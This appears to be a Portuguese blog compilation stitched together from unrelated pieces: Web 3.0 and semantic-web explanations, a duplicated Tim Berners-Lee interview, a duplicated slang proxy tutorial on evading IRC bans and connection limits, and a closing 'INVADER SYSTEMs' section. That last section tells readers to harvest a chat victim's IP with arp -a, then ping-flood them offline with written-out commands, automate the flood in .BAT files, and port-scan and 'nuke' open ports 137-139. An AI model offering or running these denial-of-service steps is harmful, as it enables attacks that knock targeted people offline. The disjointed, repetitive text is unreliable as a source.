“Claro que esses são assuntos que nos preocupam a todos, mas o que você vê na web é simplesmente a humanidade: com seus aspectos horríveis, outros maravilhosos. A Internet é uma ferramenta poderosa. A informação é algo poderoso, que pode ser usado para coisas horríveis ou para coisas excelentes. Mas sou otimista quanto à humanidade, porque no final das contas, quando nos juntamos para resolver os problemas, acho que acabamos fazendo mais bem do que mal”.
Segurança e privacidade
“Talvez nosso padrão mude nos próximos anos, porque uma mudança importante seria escolher especificamente para que fim será usada a informação que colocamos na rede. No futuro, será muito fácil ter acesso ao conteúdo, mas uma empresa não poderá utilizar essa informação para um fim indevido”.
Internet provida pelo governo?
“Nos EUA, eu tenho a opção entre diversos provedores comerciais, um deles que leva fibra ótica até minha casa. Em outros países, as pessoas podem decidir que o governo seja o provedor, mas tem a ver com a cultura de cada lugar. Mas eu gosto do sistema que permite a concorrência comercial e a escolha da empresa que eu quero oferecendo conteúdo”.
Interatividade na Internet 2.0?
“A Internet pode ser muito mais interativa. No momento em que os dados forem abertos, a Internet vai poder se alimentar muito mais de aplicativos e vai se tornar muito mais poderosa”.
Twitter?
“É uma nova forma de comunicação. Hoje há tantas coisas fascinantes na Internet que eu não tenho favoritos. Sempre que há uma novidade, uma coisa que é a mais quente do momento, pode ter certeza que há outra logo atrás, chegando para tirar seu lugar”
A Web 3.0 propõe-se a ser, num período de cinco a dez anos, a terceira geração da Internet. A primeira, Web 1.0, foi a implantação e popularização da rede em si; a Web 2.0 é a que o mundo vive hoje, centrada nos mecanismos de busca como Google e nos sites de colaboração do internauta, como Wikipedia, YouTube e os sites de relacionamento social, como o Orkut. A Web 3.0 pretende ser a organização e o uso de maneira mais inteligente de todo o conhecimento já disponível na Internet.
Esta inovação está focada mais nas estruturas dos sites e menos no usuário. Pesquisa-se a convergência de várias tecnologias que já existem e que serão usadas ao mesmo tempo, num grande salto de sinergia. Banda larga, acesso móvel à internet e a tecnologia da semântica, todos utilizados juntos, de maneira inteligente e atingindo a maturidade ao mesmo tempo.
Assim, se passaria da World Wide Web (rede mundial) para World Wide Database (base de dados mundial), ou seja, se passaria de um mar de documentos para um mar de dados. Quando isso começar a acontecer de forma mais intensa, o próximo passo, num prazo de cinco a dez anos, será o desenvolvimento de programas que entendam como fazer melhor uso desses dados.
Adicionada a capacidade da semântica a um site, ele será mais eficiente. Ao se pesquisar algo, se terá respostas mais precisas. O usuário poderá fazer perguntas ao seu programa e ele será capaz de ajudá-lo de forma mais eficente, entender mais sua necessidade. O conceito de ”semântica da rede”, proposto pelo inglês Tim Berners-Lee, tem entre seus gurus Daniel Gruhl, um Ph.D. em engenharia eletrônica do MIT, é especializado em "compreensão das máquinas", e o misterioso Nova Spivack, que não revela muito sobre si, nem o nome verdadeiro, e se autodefine como empresário da alta tecnologia.
Um mecanismo de busca como o Google permite que o usuário pesquise o conteúdo de cada página,: se indicar o nome de um ator ou de um filme, todos os dados sobre este ator ou este filme aparecerão na tela. Poderá ainda utilizar a "busca avançada" para restringir um pouco mais os resultados. Mas se este usuário não se lembrar do nome do ator ou do filme, dificilmente encontrará meios de localizá-los. A Web 3.0 organizará e agrupará essas páginas, por temas, assuntos e interesses previamente expressos pelo internauta.. Por exemplo: todos os filmes policiais, que tenham cenas de perseguição de carros, produzidos nos últimos cinco anos etc.
Algumas empresas do Vale do Silício, na Califórnia, Estados Unidos, desenvolvem trabalhos nesse sentido, destacando-se o Almaden IBM Research Center, a Metaweb e a Radar Networks (de Nova Spivack). No Brasil, na PUC-Rio estão desenvolvendo trabalhos pioneiros para a Web 3.0 com ênfase na língua portuguesa. Paralelamente, estão em curso inúmeros projetos acadêmicos. E circula na comunidade da informática que em futuro próximo surgirão novidades nesse campo na Yahoo e no Skype.
Vantagens da Nova WEB 3.0
Transparência e Segurança;
Autenticidade; novas formas de fazer logins em sites
Navegabilidade; sistema de busca inteligente,
Velocidade da Informação, banco de dados proprio para cada usuario,
Inovação, novos softwares interçigados entre si
Behaviour Targeting (Segmentação Comportamental);
Reputação Digital; sistema de avaliação para os melhores sites
Identidade Digital; um banco de dados que reflete a personalidade de navegação do usuario na maquina do usuario.
Infotopia (Como as mentes produzem conhecimento);
Web Semântica;
Web em todos os lugares e aparelhos;
Marketing de influência social;
Web movel;
A Web 3.0 vai ligar tudo na Internet, desde um relogio até uma maquina de lavar.
O Daniel Gruhl, um dos diretores do Almaden IBM Research Center, fala sobre a WEB 3.0:
A Internet é como uma lista telefônica com bilhões de páginas. Um mecanismo de busca como o Google permite que o usuário pesquise o conteúdo de cada página --todos os Silva, para ficar na metáfora da lista-- e mesmo utilize a "busca avançada" para restringir um pouco mais os resultados --todos os Silva de São Paulo.
"A Web 3.0 organiza e agrupa essas páginas, por temas, assuntos e interesses previamente expressos pelo internauta", afirma Gruhl --todos os Silva que torcem para o Corinthians, votaram no PSDB e são alérgicos a frutos-do-mar, digamos. Embora a tecnologia ainda esteja na fase de pesquisa, suas possibilidades comerciais são infinitas. E as empresas não estão cegas para isso.
Uma das provas é o próprio centro do qual Gruhl faz parte. Baseado em San José, também no Vale do Silício californiano, tem como função encontrar novos usos comerciais para a rede de computadores e prever quais serão as próximas tendências, os novos YouTube, por exemplo. Gruhl, um Ph.D. em engenharia eletrônica do MIT, é especializado em "compreensão das máquinas".
Tanto esse aspecto futurista das pesquisas quanto o próprio termo Web 3.0 são responsáveis pelo maior volume de crítica que a iniciativa recebe. A principal reação vem, obviamente, da blogosfera. Nos diários virtuais de especialistas detratores, a crítica mais comum é a de que "Web 3.0" nada mais é do que a tentativa de empacotar num termo "vendável" algo que ainda nem existe. "Eu aposto que o futuro é mais "inteligência humana" do que "inteligência artificial'"
Pesquisa divulgada no início da semana pela Weber Shandwick, uma unidade da Interpublic Group, uma das maiores empresas de publicidade e marketing do mundo, mostra que tais críticas não são unânimes. Segundo o levantamento, 86% dos 104 executivos das maiores empresas americanas ouvidos acreditam que a inovação trazida pela Web 3.0 será o setor que mais ganhará importância ao longo de 2007.
"O surgimento do consumidor com mais poder significa que as companhias não podem mais simplesmente falar de inovação como uma estratégia do futuro", disse Billee Howard, do planejamento da Weber Shandwick. "As empresas precisam procurar novas maneiras de implantar isso".
O QUE É WEB SEMÂNTICA?
Demonstração da estrutura da Rede semântica.
A Web semântica é uma extensão da Web actual, que permitirá aos computadores e humanos trabalharem em cooperação. A Web semântica interliga significados de palavras e, neste âmbito, tem como finalidade conseguir atribuir um significado (sentido) aos conteúdos publicados na Internet de modo que seja perceptível tanto pelo humano como pelo computador.
A idéia da Web Semântica surgiu em 2001, quando Tim Berners-Lee, James Hendler e Ora Lassila publicaram um artigo na revista Scientific American, intitulado: “Web Semântica: um novo formato de conteúdo para a Web que tem significado para computadores vai iniciar uma revolução de novas possibilidades.”
O objectivo principal da Web semântica não é, pelo menos para já, treinar as máquinas para que se comportem como pessoas, mas sim desenvolver tecnologias e linguagens que tornem a informação legível para as máquinas. A finalidade passa pelo desenvolvimento de um modelo tecnológico que permita a partilha global de conhecimento assistido por máquinas (W3C 2001). A integração das linguagens ou tecnologias eXtensible Markup Language (XML), Resource Description Framework (RDF), arquiteturas de metadados, ontologias, agentes computacionais, entre outras, favorecerá o aparecimento de serviços Web que garantam a interoperabilidade e cooperação.
Ultimamente tem-se associado Web Semântica a Web 3.0, como um próximo movimento da Internet depois da Web 2.0 que já inicia seu crescimento.
==================================================
EXEMPLOS DE NAVEGADORES EM WEB 3.0 (Web semântica)
Hakia
http://www.hakia.com/
No hakia ele busca sua palavra seguindo 3 regras:
1. Credibilidade do site perante a web ( feita pela equipe da Hakia)
2. Mostra as mais recentes informações relacionada a busca
3. Atraves da relevância da busca
Formando assim tabbeds de: resultados na web em geral, Sites com alta credibilidade, imagens e noticias
sobre = http://company.hakia.com/about.html e http://company.hakia.com/benefits.html
powerset
http://www.powerset.com/
No powerset a busca é atraves de Factz pelo Wikipedia, Factz é como tabbeds dentro do wikipedia, ele busca artigos pelo site do wikipedia por ser considerado um site de alta confiabilidade muito usado por milhores de pessoas.
A palavre pesquisada é dividade em Factz, cada Factz abranje um assunto.
Exemplo: Se vc busca a palavra "oranges": vc terá a seguintes factz:
Que Representa : successo, prosperidade, bandeira, força, integridade, continentes
Que Contenha: dioxinas, tipos, diamantes, material e fruta.
Que Ofereça: pacotes, planos, Laranja e serviço.
Desta forma vc vai selecionar dentro da Factz (Que Representa , Que Contenha e Que Ofereça) o que realmente vc deseja saber sobre a palavre "orange"
Thinkbase
http://thinkbase.cs.auckland.ac.nz/
O Thinkbase, que exibe graficamente os relacionamentos entre dados, como os livros publicados publicados por um autor, seguidos dos filmes baseados nestes, por exemplo.
Influence Viewer
http://goosebumps4all.net/goi/
O Influence Viewer, assim com o Thinkbase, exibe um gráfico clicável sobre relacionamentos, desta vez sobre um domínio de influência, ou seja, quem influenciou quem (tratando-se principalmente de filósofos e pensadores).
Veja mais aqui: http://www.freebase.com/view/freebase/featured_application
==================================================
WEB 3.0 POR Tim Berners-Lee
Sir Timothy John Berners-Lee KBE é o inventor do World Wide Web (Rede de alcance mundial) na decada de 80 na CERN (Suíça) em 1989.
Berners-Lee nasceu em Londres em 8 de junho de 1955, Inglaterra e frequentou a Emanuel School em Wandsworth. Ele é um ex-aluno do Queen's College da Universidade de Oxford, onde construiu um computador de maneira revolucionária, que incluía ferro, um processador M6800, uma televisão velha, entre outras coisas. Foi também em Oxford que foi encontrado a hackear com um amigo e foi banido de usar o computador da universidade.
Ele trabalhou na Plessey Telecommunications Limited em 1976 como programador, e em 1978 trabalhou na D.G. Nash Limited onde trabalhou em programas de configuração de fonte e num sistema operacional.
Recentemente, Tim Berners-Lee foi considerado um dos maiores gênios vivos do mundo, segundo o levantamento "Top100 Living Geniuses", da consultoria Creators Synectics.
ENQUIRE foi um projeto desenvolvido por Tim Berners-Lee no segundo semestre de 1980, usado para reconhecer e armazenar associações de informação, ele tinha algumas das mesmas idéias da web e da web semântica, e serviu como base para o desenvolvimento das duas, mas era diferente em vários aspectos importantes, como no fato de não ser viável ser liberado para o público em geral. Ele foi implementado em uma máquina NORD-10, da Norsk Data, mas nunca foi publicado.
O primeiro servidor web, um NeXTcube usado por Berners-Lee no CERN
Internet com WWW:
WEB 2.0:
Os documentos estão hospedados em computadores dedicados/shell/vds e podem estar na forma de vídeos, sons, hipertextos e figuras. Para visualizar a informação, pode-se usar um programa de computador chamado navegador para descarregar informações (chamadas "documentos" ou "páginas") de servidores web (ou "sítios") e mostrá-los na tela do usuário. O usuário pode então seguir as hiperligações na página para outros documentos ou mesmo enviar informações de volta para o servidor para interagir com ele. O ato de seguir hiperligações é, comumente, chamado de "navegar" ou "surfar" na Web.
WEB 3.0
ENTREVISTA COM TIM BERNERS-LEE
Futuro
“A web é uma grande plataforma, e o importante é que é uma tela em branco, sobre a qual todos poderão fazer coisas com as quais eu nunca sequer sonhei. Há muitas coisas interessantes nascendo, como os dados linkados, a presença da web nos telefones celulares, que será especialmente importante em áreas rurais, por exemplo, onde a presença dos computadores é menor. Estamos começando uma Web Foundation, que pretende fazer da web algo conectado de forma humana. O importante para o futuro é pensar nos 80% da população que, hoje, não usam a internet: como a internet vai funcionar para essas pessoas? Uma das questões importantes para a missão da Web Foundation é que a web funcione como infraestrutura crítica para a sociedade. Por isso é importante que as universidades desenvolvam a web science, para entender tanto os aspectos técnicos quanto sociais da rede. Os telefones celulares serão muito importantes, mas a web sempre será acessada de formas diversas: às vezes eu preciso de coisas dentro do bolso, mas quando eu chego em casa quero uma tela de 52 polegadas, de resolução perfeita… O importante é que a web funcione de formas variadas”.
Web 3.0
“A Web 2.0 foi uma experiência muito frustrante para os usuários, porque eles colocam todas as informações em uma página e, quando acessam uma outra página, não podem usar aquele mesmo conteúdo. As redes sociais devem ser um sistema aberto, em que você controla seus dados, e essa informação pode ser usada por pessoas e sites diferentes. Você decide o que colocar e que uso isso vai ter, mas a partir de então é algo aberto. Essa é a visão de uma rede natural, feita de pessoas. Parte da ideia da rede de dados abertos linkados é a de ser a ‘rede de um amigo do amigo’: é uma rede de sites nos quais você concorda em ter seus dados. Você controla os seus dados, não uma empresa”.
Uso da Internet Semântica
“Hoje eu vejo a Internet Semântica como um movimento pelos dados abertos e eu encorajo a todos a colocarem seus dados linkados na Internet para que outros os possam utilizar. No futuro, as empresas e o governo irão nos fornecer os dados brutos e com eles poderemos fazer coisas fantásticas. Eles, por exemplo, não precisarão gastar com publicidade, já que as pessoas poderão fazer seus próprios catálogos a partir desses dados brutos”.
Sociedade
“Devemos tomar cuidado com novas formas de sociedade: tivemos vários exemplos desastrosos ao longo da história. O interessante é que em diferentes comunidades da rede as pessoas estão lidando com novas formas de democracia e de meritocracia: de como nós, como um grande grupo, tomamos uma decisão com base na maioria, mas também sabermos reagir quando nos damos conta que a minoria estava correta. Estou muito animado com os movimentos que tenho visto nesse sentido dentro da web”.
Pedofilia e crimes na internet
“Claro que esses são assuntos que nos preocupam a todos, mas o que você vê na web é simplesmente a humanidade: com seus aspectos horríveis, outros maravilhosos. A Internet é uma ferramenta poderosa. A informação é algo poderoso, que pode ser usado para coisas horríveis ou para coisas excelentes. Mas sou otimista quanto à humanidade, porque no final das contas, quando nos juntamos para resolver os problemas, acho que acabamos fazendo mais bem do que mal”.
Segurança e privacidade
“Talvez nosso padrão mude nos próximos anos, porque uma mudança importante seria escolher especificamente para que fim será usada a informação que colocamos na rede. No futuro, será muito fácil ter acesso ao conteúdo, mas uma empresa não poderá utilizar essa informação para um fim indevido”.
Internet provida pelo governo?
“Nos EUA, eu tenho a opção entre diversos provedores comerciais, um deles que leva fibra ótica até minha casa. Em outros países, as pessoas podem decidir que o governo seja o provedor, mas tem a ver com a cultura de cada lugar. Mas eu gosto do sistema que permite a concorrência comercial e a escolha da empresa que eu quero oferecendo conteúdo”.
Interatividade na Internet 2.0?
“A Internet pode ser muito mais interativa. No momento em que os dados forem abertos, a Internet vai poder se alimentar muito mais de aplicativos e vai se tornar muito mais poderosa”.
Twitter?
“É uma nova forma de comunicação. Hoje há tantas coisas fascinantes na Internet que eu não tenho favoritos. Sempre que há uma novidade, uma coisa que é a mais quente do momento, pode ter certeza que há outra logo atrás, chegando para tirar seu lugar”
TUTO = Proxy
Proxy é alguém (um computador) ke se faz passar por um outro (computador). O modo mais simples de se entender isso é no contexto de circuito virtual.
Protocolos de transporte implementam a noção de circuito virtual. Um circuito virtual entre dois computadores é como se fosse um cabo ligando os dois, ke permita o envio de bits nos dois sentidos. A criação do circuito virtual naturalmente depende da existência de conectividade entre as duas mákinas, através de linhas telefônicas, links de rádio, ou cabeamento de rede local.
No caso do TCP/IP, circuitos virtuais são circuitos TCP, também chamados canais TCP. kando você telneteia uma mákina, está criando um canal TCP ke durará até o fim da sessão remota. O envio de um mail e a leitura de uma página web também criam canais TCP.
Um canal TCP tem sempre exatamente duas extremidades, uma ativa, ke tomou a iniciativa (chamada cliente) e a outra passiva, ke aguardava a solicitação do cliente (o servidor).
Há situações onde o cliente não pode ou não deseja identificar-se como tal. Isso ocorre kando ele está numa rede protegida por um firewall, ou kando ele não possui um endereço IP "oficial" da Internet. Em situações muito específicas, razões de desempenho podem justificar essa não identificação.
Pois bem, num caso como esse, o cliente solicita a uma outra mákina ke se faça passar por cliente. Essa outra mákina fará portanto o papel de intermediário. Ela abrirá o canal TCP com o servidor, mas redirecionará todo o tráfego proveniente do servidor para o cliente oculto, e todo tráfego proveniente do cliente oculto será redirecionado para o servidor.
O recurso de poder usar um proxy em geral necessita estar previsto no cliente. Por exemplo, os browsers web costumam ter na sua configuração o servidor proxy como um ítem (no Netscape veja o menu Options/Network Preferences/Proxies). kando se possui um gateway com o recurso de proxy transparente, a previsão de configuração de proxies pode estar ausente do cliente. Nesse caso, a existência do proxy seker é percebida pelo cliente, e em geral é compulsória.
Apesar de serem noções bastante diferentes, é difícil entender porke usar um Proxy é diferente de mascarar IP, pois a funcionalidade de ambos é semelhante. Para se compreender a distinção, é necessário ter uma boa noção de como é a implementação do TCP/IP numa mákina, e os vários papéis ke tipicamente são desempenhados pelo "layer" TCP/IP e pelas aplicações.
No contexto de circuitos virtuais, no caso do proxy existem efetivamente dois canais TCP, um entre cliente e proxy, e outro entre proxy e servidor. No caso do mascaramento de IP, só há um canal TCP, e o gateway mascarador simplesmente troca nos frames os os endereços e as portas do remetente ou do destinatário, dependendo do caso, a fim de ke o servidor pense ke o cliente é o gateway.
Isso significa, por exemplo, ke no caso do mascaramento, o gateway comporta-se apenas como um roteador de pacotes, enkanto no caso do proxy ele remonta (no caso de TCP) o stream ke o cliente envia antes de retransmiti-lo ao servidor, e vice-versa, tendo portanto um overhead maior (confirme dito acima, entretanto, esse overhead pode ser compensado por benefícios de desempenho ke ocorrem em algumas situações).
Tipos de Proxy
Proxy de ie
anonymous -> Proxy Anônima, proxy http anônima simplesmente recebe a rekisição para um site (GET/POST/etc) e monta um pacote com o ip da mákina atual, assim seu ip nao ira no rekest para o servidor final, ke hospeda o site. Logo, pra esta mákina ke hospeda, kem fez a rekisicao foi a proxy, e nao voce. Entao. o servidor responde pra proxy, e a proxy simplesmente repassa pra voce.
high anonymous -> Proxy Altamente Anônima,A diferença é ke permite ke vc konecte se a um sistema forçadamente anônimo, esse tipo de proxy não repassa ekisição para um site, ele apena as adkire e envia pra vc.
transparent -> Proxy Transparente, a kal nao mascara o ip, nao altera os dados do pacote original. E socks, funcionam da mesma forma, mas o protocolo é diferente, ela é otima pois o site não conesegue enxergar seu ip, se vc pedir uma função ke serah nescessario o site obter seu ip, essa função serah kancelada.
Protocolo de Proxy de ie: HTTP, HTTPS, SOCKS4, SOCKS4A, SOCKS5
Proxy de Irc
proxy/socks 4 e 5 -> tipo comum de proxy de irc, a diferença entre proxy,socks 4 e 5 eh apenas a linguagem kada rede de irc interpreta melhor uma linguagem de proxy de irc, ela funciona da seguinte maneira, vc conecta no mirc mudando seu ip, pois as redes de irc so permite apenas 3 konecxoes por ip, kom proxy de irc vc muda seu ip contornando ke o server de irc naum deixe vc konectar por seu ip ter mais de 3 conecxoes ou por estar banido na rede, no mirc, kuandu vc usa proxy, permite ke as pessoas naum peguem seu ip pelo mirc e o pacotem, lembre se ke vhost eh proxy(ip) para shell redirecionado ao host da shell, poem na sua kabexa, proxy e vhost são pontes ke lhe permite cortar caminho, nessas pontes saum moderadas, funcionaum komo um semi escudo, impedido accesso diretamente ao seu ip ou o da shell.
COMO CONECTAR COM PROXY
->No Internet Explorer 6.0 (proxy de ie)
1.Abra o navegador ie
2.clike em "ferramentas" vai ate "opções da intrnet..."
3. vai ateh a aba "Conexões" na parte de baixo no kadro "Configurações de rede local (LAN)" clike no botaum "Configurações de LAN..."
4.vai abri uma janela com dois kuadros, no primeiro "Configurações automatica" desmarke as duas caixas, naum deixe nada markado aki.
5. no segundo kuadro "Servidor proxy" marke a primeira caixa "Usar um servidor proxy para a rede local..." agora na caixa "Endereço" coloke o ip da proxy e na caixa "prota" a porta da proxy, na ultima opção " Não usar proxy em endereçoes locais" deixe desmarcado. e de "OK".
OBS: lembre-se kaundu vc aplika uma proxy de ie, algumas paginas BR naum pode funcionar nem karregar da forma korreta. vc pode xekar nesse site http://www.ip2location.com/
IP Address : Ip da proxy
Location : Pais ke a proxy redireciona
Latitude / Longitude : latitude e lonjitude do seu provedor
Connecting through : nome do provedor
Time Zone : mostra a zona de horario
Net Speed : Tipo de velocidade
OBS: para retirar a proxy de ie basta disfazer rtd o processo, kuandu vc kiser navegar normalmente, naum use proxy de ie.
->NO MIRC
dijite:
/firewall ip:port
* Firewall is off
entaum vc dijita
/firewall on
* Firewall is on Socks4 (ip:port)
para mudar o protocolo e td de uma vez faxa no mirc "alt+o" vai abrir options do mirc
ae vc vai no kadrado [+] connect
abra ele
em --Firewall
vc tera tds as opçoes para mudar a proxy
algumas proxy de irc tem id e senhas (password), mas suam raras e boas
ah la tb tem a opção "Firewall Support" aki vc exkolhe onde a proxy de irc vai atuar , para naum ter error selecione "Both" ke ker dizer ambos.
-> Na PSYBNC
1. Entre na psybnc /server [host]:[porta] [senha].
2. Adcione um servidor de irc nela e de um /bkit pra naum conectar.
3. Agora vc ira adicionar um proxy de irc na psybnc assim : /proxy [host:porta]
4. apois adcionar de um /jump
5. Assim kom o proxy configurado na psybnc faça um /bconnect e espere conectar
6. se demorar muito, naum conectar ou se a proxy for banida do server
de irc, de /bquit e repita o processo com uma nova
proxy apartir do passo 3.
-> no BOT (eggdrop)
issu depende da .conf do bot
dentro da conf tem a opção de vc adcionar o ip e port da proxy de irc.
EH ISSO O ASSUNTO EH GRANDES PAKAS
VOU FIKAR AKI ATE MANHA FALANDO DE PROXY
kem tiver duvidads so falar ae
fuiz
BY XKN
_________________
By XKN @ -= ProxysX GrouP =-
Protocolos de transporte implementam a noção de circuito virtual. Um circuito virtual entre dois computadores é como se fosse um cabo ligando os dois, ke permita o envio de bits nos dois sentidos. A criação do circuito virtual naturalmente depende da existência de conectividade entre as duas mákinas, através de linhas telefônicas, links de rádio, ou cabeamento de rede local.
No caso do TCP/IP, circuitos virtuais são circuitos TCP, também chamados canais TCP. kando você telneteia uma mákina, está criando um canal TCP ke durará até o fim da sessão remota. O envio de um mail e a leitura de uma página web também criam canais TCP.
Um canal TCP tem sempre exatamente duas extremidades, uma ativa, ke tomou a iniciativa (chamada cliente) e a outra passiva, ke aguardava a solicitação do cliente (o servidor).
Há situações onde o cliente não pode ou não deseja identificar-se como tal. Isso ocorre kando ele está numa rede protegida por um firewall, ou kando ele não possui um endereço IP "oficial" da Internet. Em situações muito específicas, razões de desempenho podem justificar essa não identificação.
Pois bem, num caso como esse, o cliente solicita a uma outra mákina ke se faça passar por cliente. Essa outra mákina fará portanto o papel de intermediário. Ela abrirá o canal TCP com o servidor, mas redirecionará todo o tráfego proveniente do servidor para o cliente oculto, e todo tráfego proveniente do cliente oculto será redirecionado para o servidor.
O recurso de poder usar um proxy em geral necessita estar previsto no cliente. Por exemplo, os browsers web costumam ter na sua configuração o servidor proxy como um ítem (no Netscape veja o menu Options/Network Preferences/Proxies). kando se possui um gateway com o recurso de proxy transparente, a previsão de configuração de proxies pode estar ausente do cliente. Nesse caso, a existência do proxy seker é percebida pelo cliente, e em geral é compulsória.
Apesar de serem noções bastante diferentes, é difícil entender porke usar um Proxy é diferente de mascarar IP, pois a funcionalidade de ambos é semelhante. Para se compreender a distinção, é necessário ter uma boa noção de como é a implementação do TCP/IP numa mákina, e os vários papéis ke tipicamente são desempenhados pelo "layer" TCP/IP e pelas aplicações.
No contexto de circuitos virtuais, no caso do proxy existem efetivamente dois canais TCP, um entre cliente e proxy, e outro entre proxy e servidor. No caso do mascaramento de IP, só há um canal TCP, e o gateway mascarador simplesmente troca nos frames os os endereços e as portas do remetente ou do destinatário, dependendo do caso, a fim de ke o servidor pense ke o cliente é o gateway.
Isso significa, por exemplo, ke no caso do mascaramento, o gateway comporta-se apenas como um roteador de pacotes, enkanto no caso do proxy ele remonta (no caso de TCP) o stream ke o cliente envia antes de retransmiti-lo ao servidor, e vice-versa, tendo portanto um overhead maior (confirme dito acima, entretanto, esse overhead pode ser compensado por benefícios de desempenho ke ocorrem em algumas situações).
Tipos de Proxy
Proxy de ie
anonymous -> Proxy Anônima, proxy http anônima simplesmente recebe a rekisição para um site (GET/POST/etc) e monta um pacote com o ip da mákina atual, assim seu ip nao ira no rekest para o servidor final, ke hospeda o site. Logo, pra esta mákina ke hospeda, kem fez a rekisicao foi a proxy, e nao voce. Entao. o servidor responde pra proxy, e a proxy simplesmente repassa pra voce.
high anonymous -> Proxy Altamente Anônima,A diferença é ke permite ke vc konecte se a um sistema forçadamente anônimo, esse tipo de proxy não repassa ekisição para um site, ele apena as adkire e envia pra vc.
transparent -> Proxy Transparente, a kal nao mascara o ip, nao altera os dados do pacote original. E socks, funcionam da mesma forma, mas o protocolo é diferente, ela é otima pois o site não conesegue enxergar seu ip, se vc pedir uma função ke serah nescessario o site obter seu ip, essa função serah kancelada.
Protocolo de Proxy de ie: HTTP, HTTPS, SOCKS4, SOCKS4A, SOCKS5
Proxy de Irc
proxy/socks 4 e 5 -> tipo comum de proxy de irc, a diferença entre proxy,socks 4 e 5 eh apenas a linguagem kada rede de irc interpreta melhor uma linguagem de proxy de irc, ela funciona da seguinte maneira, vc conecta no mirc mudando seu ip, pois as redes de irc so permite apenas 3 konecxoes por ip, kom proxy de irc vc muda seu ip contornando ke o server de irc naum deixe vc konectar por seu ip ter mais de 3 conecxoes ou por estar banido na rede, no mirc, kuandu vc usa proxy, permite ke as pessoas naum peguem seu ip pelo mirc e o pacotem, lembre se ke vhost eh proxy(ip) para shell redirecionado ao host da shell, poem na sua kabexa, proxy e vhost são pontes ke lhe permite cortar caminho, nessas pontes saum moderadas, funcionaum komo um semi escudo, impedido accesso diretamente ao seu ip ou o da shell.
COMO CONECTAR COM PROXY
->No Internet Explorer 6.0 (proxy de ie)
1.Abra o navegador ie
2.clike em "ferramentas" vai ate "opções da intrnet..."
3. vai ateh a aba "Conexões" na parte de baixo no kadro "Configurações de rede local (LAN)" clike no botaum "Configurações de LAN..."
4.vai abri uma janela com dois kuadros, no primeiro "Configurações automatica" desmarke as duas caixas, naum deixe nada markado aki.
5. no segundo kuadro "Servidor proxy" marke a primeira caixa "Usar um servidor proxy para a rede local..." agora na caixa "Endereço" coloke o ip da proxy e na caixa "prota" a porta da proxy, na ultima opção " Não usar proxy em endereçoes locais" deixe desmarcado. e de "OK".
OBS: lembre-se kaundu vc aplika uma proxy de ie, algumas paginas BR naum pode funcionar nem karregar da forma korreta. vc pode xekar nesse site http://www.ip2location.com/
IP Address : Ip da proxy
Location : Pais ke a proxy redireciona
Latitude / Longitude : latitude e lonjitude do seu provedor
Connecting through : nome do provedor
Time Zone : mostra a zona de horario
Net Speed : Tipo de velocidade
OBS: para retirar a proxy de ie basta disfazer rtd o processo, kuandu vc kiser navegar normalmente, naum use proxy de ie.
->NO MIRC
dijite:
/firewall ip:port
* Firewall is off
entaum vc dijita
/firewall on
* Firewall is on Socks4 (ip:port)
para mudar o protocolo e td de uma vez faxa no mirc "alt+o" vai abrir options do mirc
ae vc vai no kadrado [+] connect
abra ele
em --Firewall
vc tera tds as opçoes para mudar a proxy
algumas proxy de irc tem id e senhas (password), mas suam raras e boas
ah la tb tem a opção "Firewall Support" aki vc exkolhe onde a proxy de irc vai atuar , para naum ter error selecione "Both" ke ker dizer ambos.
-> Na PSYBNC
1. Entre na psybnc /server [host]:[porta] [senha].
2. Adcione um servidor de irc nela e de um /bkit pra naum conectar.
3. Agora vc ira adicionar um proxy de irc na psybnc assim : /proxy [host:porta]
4. apois adcionar de um /jump
5. Assim kom o proxy configurado na psybnc faça um /bconnect e espere conectar
6. se demorar muito, naum conectar ou se a proxy for banida do server
de irc, de /bquit e repita o processo com uma nova
proxy apartir do passo 3.
-> no BOT (eggdrop)
issu depende da .conf do bot
dentro da conf tem a opção de vc adcionar o ip e port da proxy de irc.
EH ISSO O ASSUNTO EH GRANDES PAKAS
VOU FIKAR AKI ATE MANHA FALANDO DE PROXY
kem tiver duvidads so falar ae
fuiz
BY XKN
_________________
By XKN @ -= ProxysX GrouP =-
INVADER SYSTEMs BY XKN
INVADER SYSTEMs BY XKN
Invasão por IP
Descobrindo o IP ou Host de uma provedora:
Encontre no seu micro, o atalho ou aviso do MS-DOS/prompt. Clique nele, deverá surgir uma tela preta com a seguinte aparência:
c:\WINDOWS>
c:\Documents and Settings\user>
nele digite:
ping www.provedoradocaraquevcquer.com.br
Ficando assim:
c:\WINDOWS> PING www.provedoradocaraquevcquer.com.br
Será retornado o Host da provedora bbs e etc... da seus pulos uhauhauhauhauhuha
Eu tenho o ip e não sei a provedora
Digite no prompt/MS_DOS
tracert ipdocara
Ficando Assim:
c:WINDOWS>tracert ipdocara
Será retornado o nome da provedora do cara, é so prestar atenção.
Pegando Ip em chat:
Feche todos os seus aplicativos de rede, mirc, msn, putty, utorrent, kazza ..., que você estiver usando. Feche todos navegadores que não sejam da sala aonde o cara se encontra é lógico! Concentre-se só na sala do chat na qual se encontra o cara que vc quer pegar o ip. Peça as pessoas que estão conversando com vc pararem de te mandarem mensagens, quando isto aontecer mande algumas mensagens em sequência para a vítima, alterne para o seu MS-DOS[ALT+TAB] , na hora e digite arp -a Ficando assim: c:WINDOWS> arp -a Neste momento serão retornados, vários ips, (4 à 6 em média ). O primeiro é o ip da sala aonde vc se encontra. Entretanto, na ´´Maioria da Vezes`` o segundo ip é o do gafanhoto que vc quer mandar para os sapos ! se vc não tem certeza e deseja confirmar isto, guarde o ip e compare com as informações que vc tem sobre a vítima (provedora po exemplo). Se você não sabe nada dela, paciênia, pegue todos os ips e nuke um á um, ou faça um ping flood que será explicado abaixo, ou repita o procedimento acima várias vezes e guarde os ips que estão repetindo com mais frequência. E tome as medidas que desejar. de dns nos ips para xekar ke eles resolvem...
Tente o seguinte comando no prompt do MS-DOS
ping -f-11000 -t ipdocara ou ping -t -11000 -f ipdocara ou ping -t -11000 -f ipdocara
Repita o procedimento ate ele cair. lembre-se de que, quanto mais pessoas fazendo junto com vc, mais rápido será o tombo
vc pode fazer issu aotomatikamente.. criadu um arkivo .BAT kom os komandos ips programandos, ae naum preciza vc fikar dando ping manualmente...
Atraves de um NUKER
Pegue um scan qualquer passe nas portas do micro do mané. Observe as que estão sem proteçãp e nuke ! a maioria dos nukes vem designado as portas 137, 138, 139. Então mude e ´´meta os ferro`` nas portas sem proteção.
Usando um Scan
Passe o programa portscan nas portas do micro da vítima constantemente, ping o micro do cara como na lição 4. o ´´inimigo`` no mínimo vai ficar uma lerdeza hehehe ... Se vc quiser arriscarr, nuke ao mesmo tempo. Aviso: quem pode peder a conexão é vc !
